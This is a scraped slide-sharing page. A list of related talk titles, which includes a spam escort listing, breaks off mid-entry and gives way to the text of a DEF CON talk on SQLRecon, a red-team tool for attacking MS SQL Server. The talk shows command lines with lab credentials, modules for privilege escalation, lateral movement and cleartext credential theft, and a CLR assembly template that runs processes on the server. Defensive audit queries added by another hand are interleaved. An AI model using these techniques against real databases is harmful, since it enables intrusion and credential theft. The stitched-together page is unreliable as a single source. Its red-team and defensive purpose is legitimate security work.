Enter the Dragon -  SQL 2014 on Server Core PASS Summit 2014 EditionEnter the Dragon -  SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise Security
 
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersSQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
 
SqlSa94
SqlSa94SqlSa94
SqlSa94
 
The Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemThe Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET Ecosystem
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 

Recently uploaded

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 

Recently uploaded (20)

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
A Domino Admins Adventures (Engage 2024)
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

10
How Did This Research Come About?
Like most tooling … to solve a problem encountered on an engagement
PowerShell is good, but C# is better when evading modern defensive controls
Address the MS SQL Server C# post-exploitation tooling gap
- Modernize the approach red teamers can take when facing MS SQL Server
- Operational Security
- Execution Guardrails
- SQLRecon works with a diverse set of C2 frameworks
- Fork & Run and In-Process compatible
11-16
Command Line Usage
SQLRecon is straightforward to use. There are only three required arguments:
- An authentication type
- The hostname or IP address for a MS SQL Server
- A module
Example: Enumerating databases on a remote MS SQL Server
SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
Short-form command line arguments are supported and are case-insensitive:
SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
17
Authentication Providers
SQLRecon supports 5 different MS SQL Server authentication providers:
Authentication Type   Example
WinToken              SQLRecon.exe /a:WinToken /h:host /m:module
WinDomain             SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
Local                 SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module
AzureAD               SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module
AzureLocal            SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
18
Module Overview
SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios. Listed below are modules that can facilitate privilege escalation, lateral movement, or command execution:
- xp_cmdshell: Privilege Escalation ✅ Lateral Movement ✅ Command Execution ✅
- OLE Automation Procedures: Privilege Escalation ✅ Lateral Movement ✅ Command Execution ✅
- CLR Integration for Custom .NET Assemblies: Privilege Escalation ✅ Lateral Movement ✅ Command Execution ✅
- Agent Jobs: Privilege Escalation ✅ Lateral Movement ✅ Command Execution ✅
- Cleartext ADSI Credential Retrieval ✅
- MECM / SCCM User Management ✅
- Cleartext MECM / SCCM Credential Retrieval ✅
20-21
Get Involved!
WiFi SSID: SQLRecon-Lab
Password: DefconIsCancelled!
Rules
- Don’t DoS the lab. We’re all here to learn together.
- Don’t attack each other. We’re all here to learn together.
- You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.
Lab (kawalabs.local)
DC01 172.16.10.100
SQL01 172.16.10.101
SQL02 172.16.10.102
SQL03 172.16.10.104
MECM01 172.16.10.103
ecom01.database.windows.net
Test Connection String
SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami
22
Demo 1
Evaluating the current user’s permissions
24
Demo 2
Locating MS SQL Servers in AD via SPNs
26
Demo 3
Enumerating Azure MS SQL Server Database
28
Demo 4
Unprivileged UNC Path Injection
30
Demo 5
Operational Security and Execution Guardrails
32-33
Demo 6
Privilege Escalation: Abusing Impersonation
BUILTIN\Users can impersonate sa!
35-36
Demo 7
Lateral Movement: Abusing Linked MS SQL Servers
SQL02 has an MS SQL Server link to SQL03
37
Demo 7
Lateral Movement: Abusing Linked MS SQL Servers
- CLR Integration allows custom .NET assemblies to be imported into MS SQL Server
- Assemblies get stored inside a SQL database Stored Procedure
- You can then execute whatever is inside the custom assembly!
38
Demo 7
Lateral Movement: Abusing Linked MS SQL Servers
Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410

    // sql.cs
    // Compile: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\sql.cs
    using System;
    using System.Data;
    using System.Data.SqlClient;
    using System.Data.SqlTypes;
    using Microsoft.SqlServer.Server;
    using System.Diagnostics;

    public partial class StoredProcedures
    {
        // Exposed to SQL Server as a CLR stored procedure once the assembly is loaded
        [Microsoft.SqlServer.Server.SqlProcedure]
        public static void CustomFunctionName()
        {
            // Starts a process under the SQL Server service account
            Process proc = new Process();
            proc.StartInfo.FileName = "C:\\Windows\\System32\\notepad.exe";
            proc.Start();
        }
    }
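An added check for defenders, not part of the deck or of SQLRecon: this T-SQL inventories the CLR switches and every user assembly in the current database, so an assembly built from the sql.cs template above shows up with its permission set, its hash and the procedures that expose it. It assumes SQL Server 2016 or later (HASHBYTES over varbinary(max)); the sys.trusted_assemblies view is queried only where it exists (2017+).

```sql
-- Added audit example (not from the SQLRecon deck). Run as sysadmin in each
-- database you care about: sys.assemblies and friends are per-database.

-- 1. Instance-level switches. 'clr enabled' = 1 lets assemblies execute;
--    'clr strict security' (2017+) = 1 forces assemblies to be signed or
--    listed in sys.trusted_assemblies before they will load.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('clr enabled', 'clr strict security');

-- 2. Every user-defined assembly here, with permission set, owner and a
--    SHA-256 of the DLL bytes for matching against known-good builds.
--    A procedure that calls Process.Start, like sql.cs, needs UNSAFE.
SELECT DB_NAME()                  AS database_name,
       a.name                     AS assembly_name,
       a.permission_set_desc,
       USER_NAME(a.principal_id)  AS owner_name,
       a.create_date,
       CONVERT(char(64), HASHBYTES('SHA2_256', f.content), 2) AS sha256
FROM sys.assemblies a
JOIN sys.assembly_files f ON f.assembly_id = a.assembly_id AND f.file_id = 1
WHERE a.is_user_defined = 1
ORDER BY a.create_date DESC;

-- 3. Procedures and functions backed by those assemblies, i.e. what a
--    caller would EXECUTE to run the managed code.
SELECT OBJECT_SCHEMA_NAME(m.object_id) + '.' + OBJECT_NAME(m.object_id) AS object_name,
       a.name AS assembly_name,
       m.assembly_class,
       m.assembly_method
FROM sys.assembly_modules m
JOIN sys.assemblies a ON a.assembly_id = m.assembly_id
WHERE a.is_user_defined = 1;

-- 4. On 2017+, the allow-list that bypasses strict security (SHA-512).
IF OBJECT_ID('sys.trusted_assemblies') IS NOT NULL
    SELECT description, create_date, created_by,
           CONVERT(char(128), hash, 2) AS sha512
    FROM sys.trusted_assemblies;

-- Removal of an unexpected assembly, in order:
-- DROP PROCEDURE <schema>.<object_name>;  DROP ASSEMBLY <assembly_name>;
-- and, if CLR is not needed at all: EXEC sp_configure 'clr enabled', 0; RECONFIGURE;
```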
40-41
Demo 8
Credential Abuse: ADSI Double-Link Boomerang
SQL03 has an ADSI link to DC01
43
Demo 9
SCCM / MECM Enumeration
48
Defensive Considerations
Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance!
github.com/xforcered/SQLRecon/wiki
49
Defensive Considerations
Top 3 MS SQL Server Security Controls
- Follow the Microsoft SQL Server best practices!
- Consider removing or restricting the BUILTIN\Users account and low privilege groups from authenticating against MS SQL Server instances
- Evaluate impersonation and MS SQL Server links
github.com/xforcered/SQLRecon/wiki
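An added audit for the three controls on this slide, not part of the deck or of the SQLRecon wiki: one query each for broad Windows group logins, server-level IMPERSONATE grants (the Demo 6 path) and linked-server login mappings (Demos 7 and 8). It assumes a sysadmin connection; the group name patterns are the common ones, extend them for your environment.

```sql
-- Added audit example (not from the SQLRecon deck). Run as sysadmin.

-- 1. Broad Windows groups holding a server login. BUILTIN\Users or
--    NT AUTHORITY\Authenticated Users here means every domain user can
--    connect and enumerate the instance (Demos 1 and 4).
SELECT name, type_desc, is_disabled, create_date
FROM sys.server_principals
WHERE type = 'G'                                   -- Windows group
  AND (name LIKE 'BUILTIN\%'
       OR name LIKE 'NT AUTHORITY\%'
       OR name LIKE '%\Domain Users');

-- 2. Server-level IMPERSONATE grants. A low-privilege grantee that can
--    impersonate sa or any sysadmin is a privilege escalation path.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       p.state_desc,
       CASE WHEN IS_SRVROLEMEMBER('sysadmin', target.name) = 1
            THEN 'TARGET IS SYSADMIN' ELSE '' END AS note
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = p.major_id
WHERE p.class = 101                                -- 101 = server principal
  AND p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W');
-- Remediation for the lab case on slide 32:
-- REVOKE IMPERSONATE ON LOGIN::sa FROM [BUILTIN\Users];

-- 3. Linked servers and the login mapping each one uses. local_login
--    '<any login>' with uses_self_credential = 0 and a fixed remote_name
--    means every caller inherits that remote identity; provider
--    ADSDSOObject is an ADSI link like the SQL03 -> DC01 one in Demo 8.
SELECT s.name AS linked_server,
       s.provider,
       s.data_source,
       s.is_rpc_out_enabled,                       -- required for EXEC ... AT
       ISNULL(lp.name, '<any login>') AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM sys.servers s
LEFT JOIN sys.linked_logins     ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name;
```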
50
Questions or Comments?
Thank You
@xforcered
github.com/xforcered/SQLRecon
IBM X-Force Red
github.com/skahwah
@sanjivkawa